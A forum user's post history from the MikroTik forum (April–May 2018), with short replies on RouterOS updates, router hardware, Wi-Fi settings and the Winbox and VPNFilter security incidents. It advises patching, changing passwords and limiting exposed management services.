Sounds like you have a firewall issue, SSL should be no different to other traffic unless affected by rules (or perhaps some other middlebox is interfering).
by R1CH
Tue May 29, 2018 5:58 pm
Forum: General
Topic: anyone facing DNS ip change to another ip, which is not set by network admin?
Replies: 2
Views: 269

Re: anyone facing DNS ip change to another ip, which is not set by network admin?

You should make sure you're using latest RouterOS and have changed all your passwords. There are several exploits that could have caused this.
by R1CH
Tue May 29, 2018 4:17 pm
Forum: General
Topic: A new scan has started
Replies: 10
Views: 1261

Re: A new scan has started

It should not be THAT easy to get a ROS version ... without authentication
Hope you aren't running any wireless networks then, since Mikrotik products broadcast the board name, radio name and RouterOS version number in every beacon!
by R1CH
Tue May 29, 2018 3:11 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

I've tested on 2 PCs, one of them is the PC which has the signing certificate and private key, the other one is a fresh Windows 10 laptop with no certificates installed. Both ran the example .exe file with no warning. You can test it yourself, simply edit hosts file or add static DNS to point upgrad...
by R1CH
Tue May 29, 2018 3:00 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

*) make winbox self upgrade check .exe signature;
I just tested this.. it checks for a signature, but not Mikrotik's signature! I sign it myself and winbox blindly runs it :-? https://imgur.com/7k8e09p
Is that really certificate based? Or simply some MD5 hash? In the latter case this should not be...
by R1CH
Mon May 28, 2018 9:09 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

*) make winbox self upgrade check .exe signature;
I just tested this.. it checks for a signature, but not Mikrotik's signature! I sign it myself and winbox blindly runs it :-? https://imgur.com/7k8e09p
Is that really certificate based? Or simply some MD5 hash? In the latter case this should not be...
by R1CH
Mon May 28, 2018 7:05 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

*) make winbox self upgrade check .exe signature;
I just tested this.. it checks for a signature, but not Mikrotik's signature! I sign it myself and winbox blindly runs it :-?

https://imgur.com/7k8e09p
by R1CH
Mon May 28, 2018 6:50 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

What's new in v3.14:
*) added support for new style authentication and encryption for connections to RouterOS v6.43;
*) make all connections in secure mode (all data is encrypted with AES128-CBC-SHA);
*) make winbox self upgrade check .exe signature;
Nice to see a focus on security! Does the "new s...
by R1CH
Sun May 27, 2018 4:10 pm
Forum: General
Topic: Problem with thread access in ffmpeg
Replies: 5
Views: 507

Re: Problem with thread access in ffmpeg

Very weird. RTMP uses TCP and 1.8mbps should be no problem for any Routerboard. Maybe check MTU etc?
by R1CH
Fri May 25, 2018 2:43 pm
Forum: General
Topic: Problem with thread access in ffmpeg
Replies: 5
Views: 507

Re: Problem with thread access in ffmpeg

What's the bandwidth of the source stream?
by R1CH
Fri May 25, 2018 2:40 pm
Forum: General
Topic: How to avoid exposing RB version over a wireless AP?
Replies: 3
Views: 407

Re: How to avoid exposing RB version over a wireless AP?

This information along with the radio name and model number is directly encoded into the 802.11 beacons - you can not remove it (yet).

viewtopic.php?t=133186
by R1CH
Thu May 24, 2018 7:44 pm
Forum: General
Topic: CCR1009-7G-1C-1S+ 10G SFP
Replies: 1
Views: 265

Re: CCR1009-7G-1C-1S+ 10G SFP

Bandwidth tests should be run THROUGH the device, not ON the device. Generating 10G of traffic needs lots of CPU, so it maxes out at a single core on CCR1009.
by R1CH
Thu May 24, 2018 7:41 pm
Forum: General
Topic: [Security] Attackers changed DNS servers
Replies: 8
Views: 4975

Re: [Security] Attackers changed DNS servers

Because you run an old version of RouterOS. Update and change all passwords.
by R1CH
Thu May 24, 2018 4:40 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

How do you know for sure it was the www exploit that was used instead of for example the more recent winbox exploit?
by R1CH
Wed May 23, 2018 8:29 pm
Forum: RouterBOARD hardware
Topic: VPNFilter Malware
Replies: 8
Views: 5027

Re: VPNFilter Malware

"We are unsure of the particular exploit used in any given case"

This is yet another reason why we need shell access to our own routers so we can do our own investigating looking for signs of compromise. Not every exploit is public.
by R1CH
Fri May 18, 2018 9:46 pm
Forum: General
Topic: I cant quite wrap my head around this one...
Replies: 62
Views: 5519

Re: I cant quite wrap my head around this one...

Sounds like the BT router has some AQM built in that you will need to replicate with RouterOS queue rules. Given the age of RouterOS kernel though it won't be able to compete with modern AQM like fq_codel (https://www.bufferbloat.net/projects/codel/wiki/) which is easy to set-and-forget.
by R1CH
Fri May 18, 2018 9:43 pm
Forum: General
Topic: Firewall Logic / Operation [SOLVED]
Replies: 2
Views: 421

Re: Firewall Logic / Operation [SOLVED]

An established connection should be tracked for 24 hours at minimum, I don't know where you're seeing 60 seconds but that certainly doesn't sound right. You should be seeing SYN, SYN+ACK, ACK as the connection establishment procedure. I'm also not clear what you mean by renegotiating, all connection...
by R1CH
Fri May 18, 2018 6:55 pm
Forum: RouterBOARD hardware
Topic: RB850Gx2 vs RB450Gx4
Replies: 49
Views: 10157

Re: RB850Gx2 vs RB450Gx4

No heatsink on the IPQ4019 chip?! Is it really that power efficient?
by R1CH
Sat May 12, 2018 12:05 am
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

Both of mine were new, from the only place in NL that had them in stock at the time (Routershop, listed as official reseller on "Buy" page). They were not in CPE mode once I was able to get a connection, something just caused the first time power up to behave very weirdly. Maybe next time I will try...
by R1CH
Thu May 10, 2018 7:22 pm
Forum: RouterBOARD hardware
Topic: What can be improved in hEX (RB750Gr3)?
Replies: 22
Views: 3588

Re: What can be improved in hEX (RB750Gr3)?

A CCR1009 is cheap enough, plus Tile architecture is end of life so I don't see new products based on that. I'd like a new hEX to be based on quad core ARM (same as hAP AC2) and 8 GigE ports, maybe one SFP/SFP+ if we're lucky. Plus a separate POE version able to handle ~ 80W combined output. Nothing...
by R1CH
Thu May 10, 2018 5:56 pm
Forum: RouterBOARD hardware
Topic: 10GBASE-T for Mikrotik
Replies: 13
Views: 2106

Re: 10GBASE-T for Mikrotik

Because 99.9% of home users don't need > 1gbps, since their devices won't support it. 8 port 10GB for $150? Who are you kidding! A switch alone would be $500+.

I would appreciate more ports in Mikrotik products though, 4+1 is not enough these days.
by R1CH
Thu May 10, 2018 5:53 pm
Forum: General
Topic: Security advisory emails
Replies: 1
Views: 488

Re: Security advisory emails

I've still yet to receive an email about the winbox zero-day exploit that affected < 6.42.1, I would argue a zero day deserves an email more than an exploit that was patched over a year ago!
by R1CH
Wed May 09, 2018 12:58 am
Forum: General
Topic: 6.42.1, hap ac, time sync not working
Replies: 10
Views: 1169

Re: 6.42.1, hap ac, time sync not working

This sounds like it might be a poorly configured upstream ISP that filters NTP packets for "DDoS protection".
by R1CH
Tue May 08, 2018 9:48 pm
Forum: Wireless Networking
Topic: Use AES-CCM only (unicast & group ciphers)
Replies: 4
Views: 1049

Re: Use AES-CCM only (unicast & group ciphers)

No one should be considering TKIP in 2018 for either unicast or group ciphers. It's trivially broken and AES has been part of the spec since 2004. Any device not supporting AES today belongs in the trash.
by R1CH
Mon May 07, 2018 2:43 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

I only did a quick test of 5 GHz to confirm the unit was working OK, 176.24 mbps to hAP AC at -60dBm. 2.4 GHz isn't too important to me so I didn't test it.
by R1CH
Mon May 07, 2018 1:39 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

Yes, can configure over both wired and wireless. Very strange first time startup behavior though.
by R1CH
Mon May 07, 2018 12:50 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

Re: hAP AC2 Wrong Setup Instructions

As soon as I plugged in an ethernet cable, the link went up and down several times and now the default wireless network is broadcasting (??!). Looking at the logs it seems the unit didn't even register as being powered on until I plugged in the ethernet, it was on for 5+ minutes but the log shows: 0...
by R1CH
Mon May 07, 2018 12:44 pm
Forum: RouterBOARD hardware
Topic: hAP AC2 Wrong Setup Instructions
Replies: 9
Views: 3007

hAP AC2 Wrong Setup Instructions

I have received my second hAP AC2 now, but both the previous unit and this new unit are not broadcasting any network by default. https://i.imgur.com/kk5GDjA.jpg Is this a mistake with the instructions or is something else going on? As far as I know my distributor is not making any modifications to t...
by R1CH
Thu May 03, 2018 4:56 pm
Forum: General
Topic: PSN NAT Type
Replies: 5
Views: 1170

Re: PSN NAT Type

The problem is more likely related to your ISP modem or TP-Link load balancer. You shouldn't need to do anything special to have PS4 work fine, default NAT type will allow any inbound packets to endpoint opened ports.
by R1CH
Wed May 02, 2018 4:32 pm
Forum: Wireless Networking
Topic: 802.11ac required ratarate
Replies: 11
Views: 1512

Re: 802.11ac required ratarate

You cannot configure 802.11ac rates in RouterOS (yet?)
by R1CH
Wed May 02, 2018 4:31 pm
Forum: General
Topic: "Optimal Mangle" from "RouterOS by Example" performance?
Replies: 16
Views: 2151

Re: "Optimal Mangle" from "RouterOS by Example" performance?

You can't avoid examining every packet, the benefit is you can shortcut the mark packet rules evaluation by ordering the rules by volume. Eg if you only care about http traffic, you mark port 80 as http, mark everything else as other, then when it comes to packet marking you have mark other first in...
by R1CH
Wed May 02, 2018 12:15 pm
Forum: General
Topic: ovpn connection established? Is this an attack? [SOLVED]
Replies: 4
Views: 1466

Re: ovpn connection established? Is this an attack? [SOLVED]

Be aware that the OpenVPN daemon in RouterOS is a custom Mikrotik version and given their history of other NIH-daemons, it may have remotely exploitable security holes. It is not the official open source OpenVPN daemon which has had rigorous security testing, so I would advise against exposing it to...
by R1CH
Mon Apr 30, 2018 6:32 pm
Forum: RouterBOARD hardware
Topic: wAP AC 3 (IEEE 802.1ax)
Replies: 19
Views: 2884

Re: wAP AC 3 (IEEE 802.1ax)

based on open source
This is where you are incorrect
Best to avoid anything open source and re-invent everything in house? Meanwhile every other manufacturer is happily using ath10k driver: https://wireless.wiki.kernel.org/en/users/drivers/ath10k And yes, open source driver even has working spectra...
by R1CH
Sat Apr 28, 2018 4:00 pm
Forum: RouterBOARD hardware
Topic: wAP AC 3 (IEEE 802.1ax)
Replies: 19
Views: 2884

Re: wAP AC 3 (IEEE 802.1ax)

the bigger problem is driver support since Mikrotik creates here own drivers. The actual drivers doesn't support anything of WAVE 2, are way behind competitors Performance, and this will not change, so I'm not Interested in new devices, with rudimentary driver support and without any features.... 1...
by R1CH
Thu Apr 26, 2018 12:42 pm
Forum: General
Topic: Auto Upgrade Mirror
Replies: 2
Views: 1368

Re: Auto Upgrade Mirror

That's a Cloudfront IP, maybe at some point you thought to auto upgrade by entering IP of Mikrotik update server? Either way that isn't going to work, just remove it.
by R1CH
Tue Apr 24, 2018 11:50 pm
Forum: General
Topic: Bottleneck on CCR (possible queue related)
Replies: 9
Views: 1053

Re: Bottleneck on CCR (possible queue related)

Are you sure this isn't caused by your LAG? Depending how you are distributing packets you may be saturating one of the ports with too much traffic. Any chance to test with a 10G uplink?
by R1CH
Tue Apr 24, 2018 11:31 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

I know ... but it input chain is not the same as forward one. You can block access to router but not traffic forwarded to/from users.
Dropping in input is fine, but I've seen several blacklists use raw table which would obviously affect forwarded traffic too.
by R1CH
Tue Apr 24, 2018 11:11 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

Why blocking access to router is bad idea? Should "popular" addresses try to access our router?
You should be dropping such packets anyway. If you add them to a blacklist which blocks all communications from that IP, then you block legitimate services if someone spoofs them.
by R1CH
Tue Apr 24, 2018 10:55 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

If you're blacklisting based on connection attempts to certain ports, I would advise against it. Doing this opens up a new attack vector where an attacker with IP spoofing capabilities (eg many cheap VPS providers) can spoof popular IPs and cause your network to block legitimate services. Taking any...
by R1CH
Mon Apr 23, 2018 6:28 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

When is the first known exploit of this so we can browse the logs. And have exploit rewritten the log file?
The exploit may not appear in the logs. It can download system passwords without logging in, so even if there appears no successful or failed logins, you should consider your passwords compr...
by R1CH
Mon Apr 23, 2018 6:20 pm
Forum: Announcements
Topic: v6.42.1 [current]
Replies: 272
Views: 44699

Re: v6.42.1 [current]

No issues across my mix of devices (RB750Gr3, wAP AC, hAP AC, RB951).
by R1CH
Mon Apr 23, 2018 5:58 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
Shifting of the blame onto users... what else are we supposed to use for remote management?
Where do you see shifting blame on the users? It is information for users to know that routers are safe against this vulner...
by R1CH
Mon Apr 23, 2018 5:38 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
Shifting of the blame onto users... what else are we supposed to use for remote management?
by R1CH
Mon Apr 23, 2018 5:07 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

Correct me if I'm wrong, but isn't something missing here? Now we know how they got passwords to log in, but what about those files (script and binary) uploaded to router and (probably) executed by RouterOS? Is it some other hidden functionality of WinBox we know nothing about?
When the tool gets y...
by R1CH
Mon Apr 23, 2018 1:31 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

So is this it https://www.securityweek.com/remotely-e ... s-routeros ?

As it's over a month old post..
No, that's a different vulnerability in the SMB service.
by R1CH
Mon Apr 23, 2018 1:26 pm
Forum: Announcements
Topic: Advisory: Vulnerability exploiting the Winbox port [SOLVED]
Replies: 204
Views: 158707

Re: Advisory: Vulnerability exploiting the Winbox port

This is really scary. Can you explain how this happened in a more technical manner? Why is authentication not the first thing that is required before downloading files etc is possible? Why is the user database even made available over the winbox port prior to establishment of an authenticated connec...
by R1CH
Sun Apr 22, 2018 11:52 pm
Forum: Wireless Networking
Topic: "Management frame protection" - 802.11w compatibility
Replies: 10
Views: 3478

Re: "Management frame protection" - 802.11w compatibility

Anyone has any news about this issue? I'm surprised how neglected this feature was for this whole time, and now just became one of the top priority features that Mikrotik MUST go for. Specially these days, where any newbie can buy an extremely inexpensive WiFi Deauther anywhere... Any way to push M...
by R1CH
Sun Apr 22, 2018 11:02 pm
Forum: General
Topic: winbox vulnerable! Unusual login to routers [SOLVED]
Replies: 44
Views: 10085

Re: winbox vulnerable! Unusual login to routers [SOLVED]

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.
The VPN still requires exposing to the internet. Given how Mikrotik writes their own VPN daemons, I don't see how a VPN ...
by R1CH
Tue Apr 17, 2018 4:20 pm
Forum: Announcements
Topic: v6.42 [current]
Replies: 147
Views: 27570

Re: v6.42 [current]

Upgraded a bunch of hEX r3, wAP AC and hAP AC (original) with no issues. Holding off on the CCR-1009 for a bit.
by R1CH
Tue Apr 17, 2018 4:18 pm
Forum: General
Topic: MikroTik 6.41.4 - FTP daemon Denial of Service PoC
Replies: 25
Views: 1733

Re: MikroTik 6.41.4 - FTP daemon Denial of Service PoC

Another home grown Mikrotik daemon with vulnerabilities... :roll: . Any normal Linux ftp daemon will not be vulnerable to such simple DoS attack. Trying to claim this is a normal DoS attack that would work against any service is wrong, see " 6 connections and less than 80KB crafted requests are enou...
by R1CH
Sun Apr 15, 2018 6:48 pm
Forum: General
Topic: ROS SMB version - HP scan destination not compatible
Replies: 5
Views: 632

Re: ROS SMB version - HP scan destination not compatible

This makes me wonder why Mikrotik don't use Samba like every other home router manufacturer. They would get immediate compatibility with pretty much every SMB version. What benefit does a home grown SMB daemon provide? Certainly not security...
by R1CH
Sun Apr 15, 2018 6:17 pm
Forum: Wireless Networking
Topic: Removing Mikrotik elements from beacons
Replies: 15
Views: 2288

Removing Mikrotik elements from beacons

Hello, Is there a way to prevent RouterOS from advertising itself in the 802.11 beacon frames? It's not so great to publicly broadcast the radio name, model name and RouterOS version to the world. This makes exploiting of Mikrotik networks much easier, since an adversary doesn't even need to break t...
by R1CH
Sun Apr 15, 2018 6:08 pm
Forum: General
Topic: Hotspot doesn't redirect to login page from https:// pages
Replies: 10
Views: 7789

Re: Hotspot doesn't redirect to login page from https:// pages

Nope, HTTPS is still secure and can't be attacked with a man in the middle without installing a root CA on the client.

A properly configured hotspot will open the portal page automatically on any modern device.